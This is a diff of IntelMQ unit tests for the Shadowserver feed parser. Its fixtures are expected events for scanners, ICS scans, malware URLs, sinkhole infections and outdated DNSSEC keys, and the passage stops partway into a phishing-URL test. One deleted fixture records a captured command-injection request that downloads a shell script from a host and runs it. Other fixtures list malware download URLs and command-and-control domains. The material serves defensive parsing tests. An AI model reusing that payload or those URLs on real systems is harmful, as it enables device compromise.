-           'time.source': '2018-08-29T00:00:05+00:00',
-           'source.ip': '198.51.100.5',
-           'source.port': 52513,
-           'source.asn': 27668,
-           'source.geolocation.cc': 'EC',
-           'source.geolocation.region': 'AZUAY',
-           'source.geolocation.city': 'CUENCA',
-           'source.reverse_dns': '198-51-100-5.example.net',
-           'destination.ip': '203.0.113.6',
-           'destination.port': 80,
-           'destination.asn': 17169,
-           'destination.geolocation.cc': 'AT',
-           'destination.fqdn': '203-0-113-6.example.net',
-           'extra.type': 'http-scan',
-           'extra.naics': 1,
-           'extra.sic': 2,
-           'extra.sector': 'IT1',
-           'extra.destination.sector': 'IT2',
-           'extra.public_source': 'SISSDEN',
-           'extra.sensorid': '53c1549f-f806-4b82-8b3a-6673456cd40f',
-           'extra.pattern': 'example-pattern',
-           'extra.url': '/',
-           'extra.file.md5': '12345',
-           'extra.file.sha256': '67890',
-           'extra.request_raw': 'GET / HTTP/1.1',
-           },
-           {'__type': 'Event',
-           'feed.name': 'ShadowServer HTTP-Scanners',
-           'feed.name': 'ShadowServer HTTP-Scanners',
-           'classification.identifier': 'http',
-           'classification.taxonomy': 'information-gathering',
-           'classification.type': 'scanner',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           'time.observation': '2019-01-01T00:00:00+00:00',
-           'time.source': '2018-08-29T00:04:08+00:00',
-           'source.ip': '198.51.100.3',
-           'source.port': 33418,
-           'source.asn': 23033,
-           'source.geolocation.cc': 'US',
-           'source.geolocation.region': 'WASHINGTON',
-           'source.geolocation.city': 'EVERETT',
-           'source.reverse_dns': '198-51-100-3.example.net',
-           'destination.ip': '203.0.113.217',
-           'destination.port': 80,
-           'destination.asn': 56630,
-           'destination.geolocation.cc': 'RU',
-           'destination.fqdn': '203-0-113-217.example.net',
-           'extra.type': 'http-scan',
-           'extra.naics': 1,
-           'extra.sic': 2,
-           'extra.sector': 'Communications',
-           'extra.destination.sector': 'IT',
-           'extra.public_source': 'SISSDEN',
-           'extra.sensorid': '5800ff5d-277e-48aa-b904-0997a00c6a37',
-           'extra.pattern': 'example-pattern',
-           'extra.url': '/axis-cgi/aol%2A/_do/rss_popup?blogID=',
-           'extra.file.md5': '09876',
-           'extra.file.sha256': '54321',
-           'extra.request_raw': 'GET /axis-cgi/aol%2A/_do/rss_popup?blogID= HTTP/1.1',
-           },
-          ]
-
-
-class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
-    """
-    A TestCase for a ShadowserverParserBot.
-    """
-
-    @classmethod
-    def set_bot(cls):
-        cls.bot_reference = ShadowserverParserBot
-        cls.default_input_message = EXAMPLE_REPORT
-
-    def test_event(self):
-        """ Test if correct Event has been produced. """
-        self.run_bot()
-        for i, EVENT in enumerate(EVENTS):
-            self.assertMessageEqual(i, EVENT)
-
-
-if __name__ == '__main__':  # pragma: no cover
-    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_hp_ics_scan.py b/intelmq/tests/bots/parsers/shadowserver/test_hp_ics_scan.py
deleted file mode 100644
index 03a030a25..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/test_hp_ics_scan.py
+++ /dev/null
@@ -1,117 +0,0 @@
-# SPDX-FileCopyrightText: 2019 Sebastian Wagner
-#
-# SPDX-License-Identifier: AGPL-3.0-or-later
-
-# -*- coding: utf-8 -*-
-
-import os
-import unittest
-
-import intelmq.lib.test as test
-import intelmq.lib.utils as utils
-from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
-
-with open(os.path.join(os.path.dirname(__file__), 'testdata/hp_ics_scan.csv')) as handle:
-    EXAMPLE_FILE = handle.read()
-EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
-
-EXAMPLE_REPORT = {"feed.name": "ShadowServer ICS-Scanners",
-                  "raw": utils.base64_encode(EXAMPLE_FILE),
-                  "__type": "Report",
-                  "time.observation": "2019-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-hp_ics_scan-test-geo.csv",
-                  }
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'ShadowServer ICS-Scanners',
-           'feed.name': 'ShadowServer ICS-Scanners',
-           'classification.identifier': 'ics',
-           'classification.taxonomy': 'information-gathering',
-           'classification.type': 'scanner',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           'time.observation': "2019-01-01T00:00:00+00:00",
-           'time.source': "2018-09-16T00:00:54+00:00",
-           'source.ip': "198.51.100.5",
-           'source.port': 56066,
-           'source.asn': 3462,
-           'source.geolocation.cc': "TW",
-           'source.geolocation.region': "KEELUNG CITY",
-           'source.geolocation.city': "KEELUNG",
-           'source.reverse_dns': "5.dynamic-ip.example.net",
-           'protocol.application': "http",
-           'extra.type': "ics-scan",
-           'destination.ip': "203.0.113.10",
-           'destination.port': 80,
-           'destination.asn': 39324,
-           'destination.geolocation.cc': "FI",
-           'destination.fqdn': "203-0-113-10.example.net",
-           'extra.naics': 518210,
-           'extra.sic': 737415,
-           'extra.sector': "Communications",
-           'extra.destination.sector': "IT",
-           'extra.public_source': "SISSDEN",
-           'extra.sensorid': "000a14be-2fd9-408f-a855-fd7f984f6bca",
-           'extra.state': "new_connection",
-           'extra.slave_id': "aa-bb-cc",
-           'extra.function_code': 1,
-           'extra.request': "('/login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.15/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$')",
-           'extra.response': 404,
-           },
-           {'__type': 'Event',
-           'feed.name': 'ShadowServer ICS-Scanners',
-           'feed.name': 'ShadowServer ICS-Scanners',
-           'classification.identifier': 'ics',
-           'classification.taxonomy': 'information-gathering',
-           'classification.type': 'scanner',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           'time.observation': "2019-01-01T00:00:00+00:00",
-           'time.source': "2018-09-16T23:51:13+00:00",
-           'source.ip': "198.51.200.50",
-           'source.port': 60565,
-           'source.asn': 26599,
-           'source.geolocation.cc': "BR",
-           'source.geolocation.region': "SAO PAULO",
-           'source.geolocation.city': "ITAPEVI",
-           'source.reverse_dns': "198-51-200-50.example.net",
-           'protocol.application': "http",
-           'extra.type': "ics-scan",
-           'destination.ip': "203.0.113.105",
-           'destination.port': 80,
-           'destination.asn': 15626,
-           'destination.geolocation.cc': "UA",
-           'destination.fqdn': "203-0-113-105.example.net",
-           'extra.naics': 1,
-           'extra.sic': 2,
-           'extra.sector': "Communications",
-           'extra.destination.sector': "IT",
-           'extra.public_source': "SISSDEN",
-           'extra.sensorid': "c010c930-fdbc-458c-b82d-d872d3ef206d",
-           'extra.state': "new_connection",
-           'extra.slave_id': "11-22-33",
-           'extra.function_code': 2,
-           'extra.request': "('/')",
-           'extra.response': 302,
-           },
-          ]
-
-
-class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
-    """
-    A TestCase for a ShadowserverParserBot.
-    """
-
-    @classmethod
-    def set_bot(cls):
-        cls.bot_reference = ShadowserverParserBot
-        cls.default_input_message = EXAMPLE_REPORT
-
-    def test_event(self):
-        """ Test if correct Event has been produced. """
-        self.run_bot()
-        for i, EVENT in enumerate(EVENTS):
-            self.assertMessageEqual(i, EVENT)
-
-
-if __name__ == '__main__':  # pragma: no cover
-    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_malware_url.py b/intelmq/tests/bots/parsers/shadowserver/test_malware_url.py
new file mode 100644
index 000000000..b19b200b5
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_malware_url.py
@@ -0,0 +1,107 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/malware_url.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Malware URL',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-malware_url-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'malware-url',
+   'classification.taxonomy' : 'malicious-code',
+   'classification.type' : 'malware-distribution',
+   'extra.application' : 'http',
+   'source.url' : 'http://41.86.0.0:50008/Mozi.m',
+   'feed.name' : 'Malware URL',
+   'malware.hash.sha256' : '12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef',
+   'malware.name' : 'cve-2016-10372',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 37203,
+   'source.geolocation.cc' : 'LR',
+   'source.geolocation.city' : 'MONROVIA',
+   'source.geolocation.region' : 'MONTSERRADO',
+   'source.ip' : '41.86.0.0',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-07T00:02:07+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'malware-url',
+   'classification.taxonomy' : 'malicious-code',
+   'classification.type' : 'malware-distribution',
+   'extra.application' : 'http',
+   'extra.source.naics' : 517311,
+   'source.url' : 'http://42.225.0.0:38173/Mozi.m',
+   'feed.name' : 'Malware URL',
+   'malware.name' : 'cve-2018-10562',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 4837,
+   'source.geolocation.cc' : 'CN',
+   'source.geolocation.city' : 'ZHUMADIAN',
+   'source.geolocation.region' : 'HENAN SHENG',
+   'source.ip' : '42.225.0.0',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-07T00:03:14+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'malware-url',
+   'classification.taxonomy' : 'malicious-code',
+   'classification.type' : 'malware-distribution',
+   'extra.application' : 'http',
+   'extra.source.naics' : 517311,
+   'source.url' : 'http://211.52.0.0:53029/Mozi.m',
+   'feed.name' : 'Malware URL',
+   'malware.name' : 'cve-2018-10562',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'source.asn' : 4766,
+   'source.geolocation.cc' : 'KR',
+   'source.geolocation.city' : 'SAGOK-MYEON',
+   'source.geolocation.region' : 'CHUNGCHEONGNAM-DO',
+   'source.ip' : '211.52.0.0',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-07T00:10:26+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_microsoft_sinkhole.py b/intelmq/tests/bots/parsers/shadowserver/test_microsoft_sinkhole.py
deleted file mode 100644
index e818fd9b5..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/test_microsoft_sinkhole.py
+++ /dev/null
@@ -1,333 +0,0 @@
-# SPDX-FileCopyrightText: 2015 Sebastian Wagner
-#
-# SPDX-License-Identifier: AGPL-3.0-or-later
-
-# -*- coding: utf-8 -*-
-
-import os
-import unittest
-
-import intelmq.lib.test as test
-import intelmq.lib.utils as utils
-from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
-
-with open(os.path.join(os.path.dirname(__file__),
-                       'testdata/microsoft_sinkhole.csv')) as handle:
-    EXAMPLE_FILE = handle.read()
-EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
-
-EXAMPLE_REPORT = {'feed.name': 'Microsoft Sinkhole',
-                  "raw": utils.base64_encode(EXAMPLE_FILE),
-                  "__type": "Report",
-                  "time.observation": "2015-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-microsoft_sinkhole-test-test.csv",
-                  }
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8075,
-           'destination.geolocation.cc': 'SG',
-           'destination.ip': '168.63.184.224',
-           'destination.port': 16470,
-           'malware.name': 'b68-zeroaccess-1-64bit',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           'source.asn': 6805,
-           'source.geolocation.cc': 'DE',
-           'source.ip': '77.12.73.138',
-           'source.port': 64742,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:00+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8075,
-           'destination.geolocation.cc': 'HK',
-           'destination.ip': '168.63.202.23',
-           'destination.port': 16470,
-           'malware.name': 'b68-zeroaccess-1-64bit',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           'source.asn': 8551,
-           'source.geolocation.cc': 'IL',
-           'source.ip': '109.64.133.187',
-           'source.port': 62473,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:00+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 16265,
-           'destination.geolocation.cc': 'NL',
-           'destination.ip': '82.192.70.219',
-           'destination.port': 16471,
-           'malware.name': 'b68-zeroaccess-1-32bit',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[3]])),
-           'source.asn': 22085,
-           'source.geolocation.cc': 'BR',
-           'source.ip': '187.24.22.90',
-           'source.port': 1030,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:00+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8075,
-           'destination.geolocation.cc': 'SG',
-           'destination.ip': '168.63.184.224',
-           'destination.port': 16470,
-           'malware.name': 'b68-zeroaccess-1-64bit',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[4]])),
-           'source.asn': 2516,
-           'source.geolocation.cc': 'JP',
-           'source.ip': '118.158.226.105',
-           'source.port': 49152,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:00+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8075,
-           'destination.geolocation.cc': 'HK',
-           'destination.ip': '207.46.138.117',
-           'destination.port': 16464,
-           'malware.name': 'b68-zeroaccess-2-32bit',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[5]])),
-           'source.asn': 20001,
-           'source.geolocation.cc': 'US',
-           'source.ip': '173.196.9.222',
-           'source.port': 55253,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:00+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8075,
-           'destination.geolocation.cc': 'SG',
-           'destination.ip': '168.63.240.164',
-           'destination.port': 16464,
-           'malware.name': 'b68-zeroaccess-2-32bit',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[6]])),
-           'source.asn': 18403,
-           'source.geolocation.cc': 'VN',
-           'source.ip': '42.112.141.154',
-           'source.port': 29554,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:00+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8075,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': '204.95.99.205',
-           'destination.port': 443,
-           'destination.url': 'http://204.95.99.205/index.php',
-           'extra.http_agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.8077)',
-           'malware.name': 'caphaw',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[7]])),
-           'source.asn': 7018,
-           'source.geolocation.cc': 'US',
-           'source.ip': '12.179.112.155',
-           'source.port': 57067,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:00+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8075,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': '204.95.99.204',
-           'destination.fqdn': 'xf5wau9lcpf5.oonucoog.cc',
-           'destination.port': 443,
-           'destination.url': 'http://xf5wau9lcpf5.oonucoog.cc/ping.html',
-           'extra.http_agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.7357)',
-           'malware.name': 'caphaw',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[8]])),
-           'source.asn': 10796,
-           'source.geolocation.cc': 'US',
-           'source.ip': '70.60.43.102',
-           'source.port': 2266,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:00+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8075,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': '204.95.99.204',
-           'destination.fqdn': '3k3kwrnj.rgk.cc',
-           'destination.port': 443,
-           'destination.url': 'http://3k3kwrnj.rgk.cc/index.php',
-           'extra.http_agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.9121)',
-           'malware.name': 'caphaw',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[9]])),
-           'source.asn': 10429,
-           'source.geolocation.cc': 'BR',
-           'source.ip': '189.108.25.26',
-           'source.port': 50634,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:00+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 3598,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': '199.2.137.201',
-           'destination.fqdn': 'ultimaresource.com',
-           'destination.port': 80,
-           'destination.url': 'http://ultimaresource.com/wild/live/file.php',
-           'extra.http_agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; BRI/1)',
-           'malware.name': 'citadel-b54',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[10]])),
-           'source.asn': 6983,
-           'source.geolocation.cc': 'US',
-           'source.ip': '66.245.69.124',
-           'source.port': 3130,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:01+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 3598,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': '199.2.137.202',
-           'destination.port': 80,
-           'destination.url': 'http://199.2.137.202/file-b29d40.php',
-           'extra.http_agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; .NET CLR 3.5.21022)',
-           'malware.name': 'citadel-b54',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[11]])),
-           'source.asn': 5650,
-           'source.geolocation.cc': 'US',
-           'source.ip': '50.52.19.180',
-           'source.port': 52176,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:01+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 3598,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': '199.2.137.201',
-           'destination.fqdn': 'prohomemain.com',
-           'destination.port': 80,
-           'destination.url': 'http://prohomemain.com/367601b6737825deb58a244576e4f098/file.php',
-           'extra.http_agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; AskTB5.6)',
-           'malware.name': 'citadel-b54',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[12]])),
-           'source.asn': 812,
-           'source.geolocation.cc': 'CA',
-           'source.ip': '99.243.32.48',
-           'source.port': 49725,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:01+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 3598,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': '199.2.137.202',
-           'destination.fqdn': 'ronapri.com',
-           'destination.port': 80,
-           'destination.url': 'http://ronapri.com/view/file.php',
-           'extra.http_agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; AskTbFWV5/5.11.3.15590)',
-           'malware.name': 'citadel-b54',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[13]])),
-           'source.asn': 2516,
-           'source.geolocation.cc': 'JP',
-           'source.ip': '106.156.210.197',
-           'source.port': 55400,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:01+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Microsoft Sinkhole',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 3598,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': '199.2.137.201',
-           'destination.fqdn': '9a5bb34eede4b85b9e81f40d530b68ff.co.cc',
-           'destination.port': 80,
-           'destination.url': 'http://9A5BB34EEDE4B85B9E81F40D530B68FF.co.cc/message.php',
-           'extra.http_agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; .NET4.0C)',
-           'malware.name': 'bamital-b58',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[14]])),
-           'source.asn': 1221,
-           'source.geolocation.cc': 'AU',
-           'source.ip': '138.217.89.25',
-           'source.port': 62254,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-09-12T00:00:01+00:00'}]
-
-
-class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
-    """
-    A TestCase for a ShadowserverParserBot.
-    """
-
-    @classmethod
-    def set_bot(cls):
-        cls.bot_reference = ShadowserverParserBot
-        cls.default_input_message = EXAMPLE_REPORT
-
-    def test_event(self):
-        """ Test if correct Event has been produced. """
-        self.run_bot()
-        for i, EVENT in enumerate(EVENTS):
-            self.assertMessageEqual(i, EVENT)
-
-
-if __name__ == '__main__':  # pragma: no cover
-    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_outdated_dnssec_key.py b/intelmq/tests/bots/parsers/shadowserver/test_outdated_dnssec_key.py
deleted file mode 100644
index e66b2cabd..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/test_outdated_dnssec_key.py
+++ /dev/null
@@ -1,93 +0,0 @@
-# SPDX-FileCopyrightText: 2018 Sebastian Wagner
-#
-# SPDX-License-Identifier: AGPL-3.0-or-later
-
-# -*- coding: utf-8 -*-
-
-import os
-import unittest
-
-import intelmq.lib.test as test
-import intelmq.lib.utils as utils
-from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
-
-with open(os.path.join(os.path.dirname(__file__), 'testdata/outdated_dnssec_key.csv')) as handle:
-    EXAMPLE_FILE = handle.read()
-EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
-
-EXAMPLE_REPORT = {"feed.name": "ShadowServer Outdated DNSSEC Key",
-                  "raw": utils.base64_encode(EXAMPLE_FILE),
-                  "__type": "Report",
-                  "time.observation": "2015-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-outdated_dnssec_key-test-geo.csv",
-                  }
-EVENTS = [{'__type': 'Event',
-           'classification.identifier': 'outdated-dnssec-key',
-           'classification.taxonomy': 'availability',
-           'classification.type': 'other',
-           'destination.asn': 65537,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': '10.10.10.11',
-           'destination.port': 53,
-           'extra.destination.sector': 'Information Technology',
-           'extra.public_source': 'verisign',
-           'extra.sector': 'Information Technology',
-           'extra.tag': 'outdated-dnssec-key',
-           'feed.name': 'ShadowServer Outdated DNSSEC Key',
-           'protocol.application': 'dns',
-           'protocol.transport': 'udp',
-           'source.asn': 65536,
-           'source.geolocation.cc': 'AT',
-           'source.geolocation.city': 'VIENNA',
-           'source.geolocation.region': 'WIEN',
-           'source.ip': '10.10.10.10',
-           'source.reverse_dns': 'example.com',
-           'time.source': '2018-10-18T00:03:50+00:00',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           },
-          {'__type': 'Event',
-           'classification.identifier': 'outdated-dnssec-key',
-           'classification.taxonomy': 'availability',
-           'classification.type': 'other',
-           'destination.asn': 65537,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': 'fe80::2',
-           'destination.port': 53,
-           'extra.public_source': 'verisign',
-           'extra.tag': 'outdated-dnssec-key',
-           'feed.name': 'ShadowServer Outdated DNSSEC Key',
-           'protocol.application': 'dns',
-           'protocol.transport': 'udp',
-           'source.asn': 65536,
-           'source.geolocation.cc': 'AT',
-           'source.ip': 'fe80::1',
-           'source.reverse_dns': 'example.com',
-           'time.source': '2018-10-18T05:08:36+00:00',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           }
-          ]
-
-
-class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
-    """
-    A TestCase for a ShadowserverParserBot.
-    """
-
-    @classmethod
-    def set_bot(cls):
-        cls.bot_reference = ShadowserverParserBot
-        cls.default_input_message = EXAMPLE_REPORT
-
-    def test_event(self):
-        """ Test if correct Event has been produced. """
-        self.run_bot()
-        for i, EVENT in enumerate(EVENTS):
-            self.assertMessageEqual(i, EVENT)
-
-
-if __name__ == '__main__':  # pragma: no cover
-    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_phish_url.py b/intelmq/tests/bots/parsers/shadowserver/test_phish_url.py
new file mode 100644
index 000000000..0783372f9
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_phish_url.py
@@ -0,0 +1,106 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/phish_url.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Phish URL',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-phish_url-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
